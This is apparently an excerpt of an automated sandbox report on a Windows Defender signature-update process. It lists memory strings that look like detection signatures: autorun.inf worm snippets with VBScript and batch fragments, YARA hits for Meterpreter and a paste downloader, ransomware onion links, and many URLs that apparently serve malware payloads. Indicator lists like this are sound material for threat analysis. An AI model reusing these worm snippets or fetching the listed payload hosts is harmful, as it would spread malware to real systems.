Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp Binary or memory string: copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp Binary or memory string: 8copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: S[autorun]
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: E[autorun]
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: G[autorun]
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: [autorun]shell\explore\command=
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: D:\Autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6273043144.00000197A4446000.00000004.00000001.sdmp Binary or memory string: %windir%\system32\win.dll\reg.bkp\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp Binary or memory string: torun.infshell\open\command=virus.exe[AutoRun]\virus.exe
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: :\AutoRun.inf
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: setaq=fso.getfile(status)iffso.fileexists(tmpt)thenfso.getfile(tmpt).attributes=0aq.copytmpt,truesetaq=fso.getfile(tmpt)aq.attributes=39anv=tmp+"\auto.exe"ifnotfso.fileexists(anv)thenaq.copyanvsetauto=fso.getfile(anv)auto.attributes=0setaut=fso.opentextfile(tmp+an,2,true,0)isi="[autorun]>open=wscript.exe//e:vbscriptthumb.dbauto>shell\open=open>shell\open\command=wscript.exe//e:vbscriptthumb.dbauto>shell\open\default=1>shell\explore=explore>shell\explore\command=wscript.exe//e:vbscriptthumb.dbauto
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: AutoRun.inf
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: AutoRun.inf]
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: %s\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: [AutoRun]
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: %c:\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Runkrag%c:\autorun.inf[AutoRun]
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Runkrag%c:\autorun.inf[AutoRun]
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: [Autorun]]
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: [autorun]d$open = autorun.exed4shellexecute = autorun.exed
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp Binary or memory string: 0echo[autorun]>"%1:\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp Binary or memory string: 0echo[autorun]>"%1:\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp Binary or memory string: [autorun]open=
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp Binary or memory string: g[autorun]open=
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: C:\TEMP\\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: C:\TEMP\\autorun.inf]
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: [Autorun]d
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: [Autorun]
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: Autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: c:\windows\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp Binary or memory string: M:\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp Binary or memory string: [autorun]]
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp Binary or memory string: atr="[autorun]"&vbcrlf&"shellexecute=wscript.exe/e:vbs
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp Binary or memory string: ?atr="[autorun]"&vbcrlf&"shellexecute=wscript.exe/e:vbs
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp Binary or memory string: %windir%\system32\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp Binary or memory string: AUTORUN.INF
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp Binary or memory string: +autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: %sautorun.inf
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: :\Autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: v[autorun];
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: deviceid&"\cysset.exe","-a+hsr")$file=fileopen($objevent.targetinstance.deviceid&"\autorun.inf"
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: adeviceid&"\cysset.exe","-a+hsr")$file=fileopen($objevent.targetinstance.deviceid&"\autorun.inf"
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: %c:\Autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: %sAutoRun.inf
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: %s\AutoRun.inf
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: %s:\AutoRun.inf
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp Binary or memory string: .vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp Binary or memory string: /cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp Binary or memory string: +/cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp Binary or memory string: [autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp Binary or memory string: /[autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp Binary or memory string: X:\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp Binary or memory string: autorun.inf4++
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp Binary or memory string: cmd /c del /a autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp Binary or memory string: cmd /c del /a autorun.inf]
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: [autorun]Open = action=Abrir carpeta para ver archivos
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: I[autorun]
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp Binary or memory string: ;&lt;br/&gt;[autorun]&lt;br/&gt;open=terserah.exe&lt;br/&gt;shellexecute=terserah.exe&lt;br/&gt;action=openfoldert
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp Binary or memory string: t;&lt;br/&gt;[autorun]&lt;br/&gt;open=terserah.exe&lt;br/&gt;shellexecute=terserah.exe&lt;br/&gt;action=openfoldert
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: \autorun.inf\
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: .*if"%1"=="+"attrib+s+a+h+r%2\autorun.inf:end
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: [autorun]shellexecute=recycler\s-6-
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: `[autorun]shellexecute=recycler\s-6-
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavdlta.vdm Jump to behavior

Networking:

barindex
Yara detected PasteDownloader
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Meterpreter
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Found Tor onion address
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: $https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://babukq4e2p4wu4iq.onion
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: Open link in tor browser: http://gdcbmuveqjsli57x.onion/b93cf40ee63ed066
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: torlink='http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion'
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: Qtorlink='http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion'
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: HTTP://www.EEEEEEE.EEE
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: http://%63%61%39%78%2e%63%6f%6d/ken.gif
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp%C5%E4%D6%C3%D0%C5%CF%A2
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/install.htm?cid=%CID%
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/open.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/run.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/scan.htm?GUID=%GUID%&cid=%CID%x
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/uninstall.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/update.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://%d.%d.%d.%d:3128/
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://%d.ctrl.%s
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://%d.ctrl.%saf
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://%domain%/config.php
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://%domain%/content.php?se_id=%d&q=%s&page=%s&ua=%s&al=%s&aff_id=%s&sub_id=%s
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://%domain%/update.php
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://%domain%/update.phpa
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://%s%simg.jpg
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://%s.com/registerguid.php?guid=
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://%s/%04d-%02d/%04d%02d%02d%02d%02d%02d.png
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://%s/%s/s_estr.php?id=%s&str=705-%sd
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://%s/%s/s_report.php?task=%u&id=%s
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp String found in binary or memory: http://%s/?aid=%shttp://%s/sync.php
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://%s/any2/%s-direct.ex
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://%s/any2/%s-direct.exx
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: http://%s/asghfd.php?&&u=%u&p=%u&lang
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: http://%s/asghfd.php?&&u=%u&p=%u&langad
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://%s/banner3.php?q=%d.%d.%d.%d.%d.%s.1.%d.%d
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://%s/block.phpa
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: http://%s/buy_online.php
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: http://%s/buy_online.phpa
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://%s/d1c.dat
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://%s/dupe.php?q=%d.%d.%d.%d.%d.%s.1.%d
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: http://%s/features.php
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://%s/ftp/g.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://%s/go.php?gcode=%s
Source: MpSigStub.exe, 00000024.00000003.6270502727.00000197A468A000.00000004.00000001.sdmp String found in binary or memory: http://%s/httpss/setup.php?action=4&mk=%s&aid=%s
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://%s/in.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://%s/index.htm?content=%s&id=%d
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://%s/index.htm?id=%4d&content=%s
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://%s/information.php?a=%s&b=%d&c=%d
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://%s/information.php?a=%s&b=%d&c=%dxL
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://%s/inspection.aspx?index=stripbooks
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://%s/jbinfo.cgi?%s:%d
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://%s/js.php?affid=%s&kw=%s
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp String found in binary or memory: http://%s/js3.php?kws=%%s&q=%%s&%%s
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://%s/kx.php
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp String found in binary or memory: http://%s/live.php?backupquery=%s
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://%s/loads.php
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://%s/loads2.php?r=%s
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://%s/mirror/ret.aspx?content=%s
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp String found in binary or memory: http://%s/poiehrgb.php?&advid=0000
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp String found in binary or memory: http://%s/search/search.cgi?s
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://%s/search/search.cgi?src=autosearch&s=%s
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: http://%s/support.php
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: http://%s/sync.php
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://%s:%d/%s%d%08dindex.asp?ToDowbSVCHOST.EXErbSeDe
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://%s:%d/%s%d%sindex.asp?%u%dOEMCP
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://%s:%d/%sPOSTid=41.php?
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://%sMozilla/4.0
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://(.-/)
Source: MpSigStub.exe, 00000024.00000003.6273043144.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://.(www.blackcheta.blogspot.com/)
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://.exeuser32.dll
Source: MpSigStub.exe, 00000024.00000003.6229929208.0000019793FDC000.00000004.00000001.sdmp String found in binary or memory: http://.ocx.cabhtml:file:ftp://
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://.zdropp.co.cc/download.php?token=
Source: MpSigStub.exe, 00000024.00000003.6273043144.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://0-2-t-9-r-6-p-4-4-4-s-0-h-e-.i-k-r-g-1-0-u-5-1-f-3-g-li-9-p-1-x-t-6-g-l-8-m-q-y-s-k-6-l.info
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://0.82211.net/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://00.1.00.2.1.11.9.online.secured.adobe.protected.file.version.9.8.online.verification.access.v
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://0147.0131.0133.0174/..----------------------....................-.....................-/.....
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: http://03ptc6fk0.ru/clogs/index.php?
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://0d91.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://0vyk.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://1-0-9.cn/zxc/index.htm
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://1.wangyouxf.cn/index.htmwidth=0height=0
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://10.103.2.247
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://10.24.13.102/office.png
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://103.133.106.72/ini/................wbk
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://103.140.251.93/_....-------------------------.....------------_----/
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://103.149.12.183/bigi.doc
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://103.149.12.183/p1.doc
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://103.149.12.183/u1.doc
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://103.213.245.135/n.hta
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://103.49.146.132/OpenCL.dll
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://103.49.146.132/cpu_tromp_AVX.dll
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://103.49.146.132/cpu_tromp_SSE2.dll
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://103.49.146.132/cudart32_80.dll
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://103.49.146.132/svchost.exe
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://104.153.45.242/~cimbonli//wp-content/upload/ken.exe
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://104.236.94.
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://104.243.35.43
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://107.170.47.94/mdsatalho/
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://107.172.130.145/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://107.173.191.48/deck/m.dot
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://107.173.219.115:4560/press1.exe
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://107.173.219.80/
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://107.189.10.150/ht/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://108.61.208.60
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://109.248.148.42/officedocument/2006/relationships/templates.dotm
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://110.34.232.11:1314
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: http://110.42.4.180:
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://112.164.188.12/hza.html
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://114.108.151.148/lib/lib.asp
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://118.184.48.95:8000/info
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://119.249.54.113/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://119.92.89.144/tmp/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://120.125.201.101/logo/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://120061996-783405463700123057.preview.editmysite.com/uploads/1/2/0
